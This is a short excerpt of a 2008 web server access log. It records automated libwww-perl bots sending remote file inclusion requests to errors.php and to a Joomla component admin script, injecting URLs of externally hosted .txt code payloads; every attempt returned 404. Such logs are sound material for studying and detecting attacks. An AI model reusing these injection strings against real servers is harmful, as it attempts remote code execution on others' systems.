64.22.89.194 - - [12/Aug/2008:10:10:31 -0700] "GET /logs/access_080312.log//errors.php?error=http://www.unesc.br/phpblogger/system/disk.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.85.208.194 - - [12/Aug/2008:10:10:45 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.folkswandertage.de/2007/mail/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.85.208.194 - - [12/Aug/2008:10:10:45 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.folkswandertage.de/2007/mail/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
